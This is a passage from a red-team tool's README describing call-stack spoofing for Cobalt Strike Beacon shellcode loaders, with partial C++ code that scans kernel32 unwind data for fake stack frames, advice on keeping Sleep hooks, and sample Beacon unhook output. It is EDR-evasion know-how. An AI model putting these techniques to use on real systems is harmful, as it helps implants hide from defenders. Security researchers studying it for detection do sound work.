[RtlVirtualUnwind](https://docs.microsoft.com/ru-ru/windows/win32/api/winnt/nf-winnt-rtlvirtualunwind)) 162 | 5. The system processes all `UNWIND_CODE`s that examined function exhbits to precisely compute the location of that frame's return address and stack pointer value. 163 | 6. Through this emulation, the System is able to walk down the call stacks chain and effectively "unwind" the call stack. 164 | 165 | In order to interfere with this process we wuold need to _revert it_ by having our reverted form of `RtlVirtualUnwind`. We would need to iterate over functions defined in a module (let's be it `kernel32`), scan each function's `UNWIND_CODE` codes and closely emulate it backwards (as compared to `RtlVirtualUnwind` and precisely `RtlpUnwindPrologue`) in order to find locations on the stack, where to put our fake return addresses. 166 | 167 | [namazso](https://twitter.com/namazso) mentions the necessity to introduce 3 fake stack frames to nicely stitch the call stack: 168 | 169 | 1. A "desync" frame (consider it as a _gadget-frame_) that unwinds differently compared to the caller of our `MySleep` (having differnt `UWOP` - Unwind Operation code). We do this by looking through all functions from a module, looking through their UWOPs, calculating how big the fake frame should be. This frame must have UWOPS **different** than our `MySleep`'s caller. 170 | 2. Next frame that we want to find is a function that unwindws by popping into `RBP` from the stack - basically through `UWOP_PUSH_NONVOL` code. 171 | 3. Third frame we need a function that restores `RSP` from `RBP` through the code `UWOP_SET_FPREG` 172 | 173 | The restored `RSP` must be set with the `RSP` taken from wherever control flow entered into our `MySleep` so that all our frames become hidden, as a result of third gadget unwinding there. 174 | 175 | In order to begin the process, one can iterate over executable's `.pdata` by dereferencing `IMAGE_DIRECTORY_ENTRY_EXCEPTION` data directory entry. 176 | Consider below example: 177 | 178 | ``` 179 | ULONG_PTR imageBase = (ULONG_PTR)GetModuleHandleA("kernel32"); 180 | PIMAGE_NT_HEADERS64 pNthdrs = PIMAGE_NT_HEADERS64(imageBase + PIMAGE_DOS_HEADER(imageBase)->e_lfanew); 181 | 182 | auto excdir = pNthdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION]; 183 | if (excdir.Size == 0 || excdir.VirtualAddress == 0) 184 | return; 185 | 186 | auto begin = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase); 187 | auto end = PRUNTIME_FUNCTION(excdir.VirtualAddress + imageBase + excdir.Size); 188 | 189 | UNWIND_HISTORY_TABLE mshist = { 0 }; 190 | DWORD64 imageBase2 = 0; 191 | 192 | PRUNTIME_FUNCTION currFrame = RtlLookupFunctionEntry( 193 | (DWORD64)caller, 194 | &imageBase2, 195 | &mshist 196 | ); 197 | 198 | UNWIND_INFO *mySleep = (UNWIND_INFO*)(currFrame->UnwindData + imageBase); 199 | UNWIND_CODE myFrameUwop = (UNWIND_CODE)(mySleep->UnwindCodes[0]); 200 | 201 | log("1. MySleep RIP UWOP: ", myFrameUwop.UnwindOpcode); 202 | 203 | for (PRUNTIME_FUNCTION it = begin; it < end; ++it) 204 | { 205 | UNWIND_INFO* unwindData = (UNWIND_INFO*)(it->UnwindData + imageBase); 206 | UNWIND_CODE frameUwop = (UNWIND_CODE)(unwindData->UnwindCodes[0]); 207 | 208 | if (frameUwop.UnwindOpcode != myFrameUwop.UnwindOpcode) 209 | { 210 | // Found candidate function for a desynch gadget frame 211 | 212 | } 213 | } 214 | ``` 215 | 216 | The process is a bit convoluted, yet boils down to reverting thread's call stack unwinding process by substituting arbitrary stack frames with carefully selected other ones, in a ROP alike approach. 217 | 218 | This PoC does not follows replicate this algorithm, because my current understanding allows me to accept the call stack finishing on an `EXE`-based stack frame and I don't want to overcompliate neither my shellcode loaders nor this PoC. Leaving the exercise of implementing this and sharing publicly to a keen reader. Or maybe I'll sit and have a try on doing this myself given some more spare time :) 219 | 220 | 221 | **More information**: 222 | 223 | - **a)** [x64 exception handling - Stack Unwinding process explained](https://docs.microsoft.com/en-us/cpp/build/exception-handling-x64?view=msvc-160) 224 | - **b)** [Sample implementation of `RtlpUnwindPrologue` and `RtlVirtualUnwind`](https://github.com/mic101/windows/blob/master/WRK-v1.2/base/ntos/rtl/amd64/exdsptch.c) 225 | - **c)** [`.pdata` section](https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#the-pdata-section) 226 | - **d)** [another sample implementation of `RtlpUnwindPrologue`](https://github.com/hzqst/unicorn_pe/blob/master/unicorn_pe/except.cpp#L773) 227 | 228 | --- 229 | 230 | ## Word of caution 231 | 232 | If you plan on adding this functionality to your own shellcode loaders / toolings be sure to **AVOID** unhooking `kernel32.dll`. 233 | An attempt to unhook `kernel32` will restore original `Sleep` functionality preventing our callback from being called. 234 | If our callback is not called, the thread will be unable to spoof its own call stack by itself. 235 | 236 | If that's what you want to have, than you might need to run another, watchdog thread, making sure that the Beacons thread will get spoofed whenever it sleeps. 237 | 238 | If you're using Cobalt Strike and a BOF `unhook-bof` by Raphael's Mudge, be sure to check out my [Pull Request](https://github.com/Cobalt-Strike/unhook-bof/pull/1) that adds optional parameter to the BOF specifying libraries that should not be unhooked. 239 | 240 | This way you can maintain your hooks in kernel32: 241 | 242 | ``` 243 | beacon> unhook kernel32 244 | [*] Running unhook. 245 | Will skip these modules: wmp.dll, kernel32.dll 246 | [+] host called home, sent: 9475 bytes 247 | [+] received output: 248 | ntdll.dll <.text> 249 | Unhook is done. 250 | ``` 251 | 252 | [Modified `unhook-bof` with option to ignore specified modules](https://github.com/mgeeky/unhook-bof) 253 | 254 | --- 255 | 256 | ## Final remark 257 | 258 | This PoC was designed to work with Cobalt Strike's Beacon shellcodes. The Beacon is known to call out to `kernel32!Sleep` to await further instructions from its C2. 259 | This loader leverages that fact by hooking `Sleep` in order to perform its housekeeping. 260 | 261 | This implementation might not work with other shellcodes in the market (such as _Meterpreter_) if they don't use `Sleep` to cool down. 262 | Since this is merely a _Proof of Concept_ showing the technique, I don't intend on adding support for any other C2 framework. 263 | 264 | When you understand the concept, surely you'll be able to translate it into your shellcode requirements and adapt the solution for your advantage. 265 | 266 | Please do not open Github issues related to "this code doesn't work with XYZ shellcode", they'll be closed immediately. 267 | 268 | --- 269 | 270 | ### ☕ Show Support ☕ 271 | 272 | This and other projects are outcome of sleepless nights and **plenty of hard work**. If you like what I do and appreciate that I always give back to the community, 273 | [Consider buying me a coffee](https://github.com/sponsors/mgeeky) _(or better a beer)_ just to say thank you! 💪 274 | 275 | --- 276 | 277 | ## Author 278 | 279 | ``` 280 | Mariusz Banach / mgeeky, 21 281 | 282 | (https://github.com/mgeeky) 283 | ``` 284 | --------------------------------------------------------------------------------